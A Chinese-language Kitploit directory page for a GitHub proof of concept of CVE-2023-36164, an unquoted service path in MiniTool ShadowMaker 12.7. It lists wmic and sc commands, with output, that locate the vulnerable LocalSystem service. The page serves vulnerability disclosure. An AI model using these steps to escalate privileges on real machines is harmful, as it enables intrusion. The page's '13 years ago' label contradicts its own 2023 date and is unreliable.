Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-36164 — MiniTool Partition Wizard ShadowMaker v.12.7 中存在一个问题,允许攻击者通过 MTAgentService 组件执行任意代码。 | Kitploit
工具/GitHubGitHub/trailer2/cve-2023-36164
权限提升漏洞分析漏洞利用二进制利用
GitHubtrailer2/cve-2023-36164

CVE-2023-36164

MiniTool Partition Wizard ShadowMaker v.12.7 中存在一个问题,允许攻击者通过 MTAgentService 组件执行任意代码。

查看仓库
13年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2023-36164

MiniTool Partition Wizard ShadowMaker v.12.7 中存在一个问题,允许攻击者通过 MTAgentService 组件执行任意代码。

漏洞标题:MiniTool Partition Wizard ShadowMaker v.12.7 - 未加引号的服务路径

日期:05/08/2023

漏洞作者:Idan Malihi

厂商主页:https://www.minitool.com/

软件链接:https://www.minitool.com/download-center/

版本:12.7

测试环境:Microsoft Windows 10 Pro

CVE : CVE-2023-36164

PoC

C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\" | findstr /i /v """ MTAgentService MTAgentService C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe Auto

C:\Users>sc qc MTAgentService [SC] QueryServiceConfig SUCCESS

SERVICE_NAME: MTAgentService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\MiniTool ShadowMaker\AgentService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : MTAgentService DEPENDENCIES : SERVICE_START_NAME : LocalSystem

C:\Users>systeminfo

Host Name: DESKTOP-LA7J17P OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19042 N/A Build 19042 OS Manufacturer: Microsoft Corporation

下载工具